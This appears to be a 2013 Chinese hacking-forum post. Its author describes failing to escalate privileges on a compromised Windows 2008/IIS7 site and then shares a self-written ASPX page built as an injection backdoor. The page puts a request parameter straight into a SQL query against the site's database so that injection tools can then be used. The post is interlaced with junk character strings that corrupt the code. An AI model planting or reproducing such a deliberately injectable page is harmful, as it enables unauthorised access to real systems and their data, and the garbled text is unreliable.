昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。5 u9 B! H+ t8 a" p3 J) G. ]2 q
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。4 M+ N" w9 b3 x# P- ~( S
代码量不多,自己写个拉倒了。烦死了。: m! X! v- n* A% W7 c/ u: B: i( V4 h6 w+ W
8 R- `. _6 r: W4 B% p& {& k, f' C ^3 B* L- ?1 m; ]! W" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
( c) _. d7 g9 G% w4 J<html xmlns="http://www.w3.org/1999/xhtml">
, Z; _6 B2 D3 F: _* \<head runat="server">7 m4 {# J8 g) J+ `7 A
<title>暗影aspx构造注射专用页面</title>5 r, W6 C: B) s
</head>2 H) L5 M& g' ?2 ^5 y9 T
<body>
# }) @& q$ u, X& k* T2 S, f: F <form id="form1" runat="server">
8 b' |9 {0 E% @* n. l0 C) |2 G1 w9 f <div>; Y, b2 f" @# [
<script language="c#" runat="server">
9 p. C- h7 n" P
) D( f' t" ]* R# B- ^! S1 x. g; G void page_init(object sender, EventArgs e)& T" i, g- j* M D8 G" J1 G' i6 q
{9 V" t- T3 L3 _
5 k, E: S6 u. n1 h4 i' X: o
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
0 u# m8 x+ {/ r+ r* t9 x e 0 ~0 _4 W d: O; M9 v( m
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();1 _) P% y0 n6 ?5 }: _" u
conn.Open();. I8 d( p0 V' D
3 b f& K$ Z y- @
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
3 I5 K$ u+ O( S5 j2 t 7 V# K$ |/ S! F/ F8 B
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);3 Y1 W, Y( e" y; H8 V. ]* V# x
int x = command.ExecuteNonQuery();: W% x; o$ q0 S( s
Response.Write(i+"\n");. I5 M& h' a( e
Response.Write(x);
, K2 g' ?) b+ O: F$ o conn.Close();
! \" l4 D6 H$ L; I; E }
4 W, K# w) t$ g8 c7 I0 A$ P; U7 z7 u2 n
: a- [ v c* S0 W) H </script>
; X# c1 d6 y! ]! l+ Q& N( S </div>3 z6 o* h- u/ X8 `6 G
</form>
% }& F: q- U* H7 S</body>
6 L$ [# K" z- }! w' x</html>5 \$ R5 W, k% n/ Y7 B
|
发表于 2013-3-20 21:32:01
收藏
支持
反对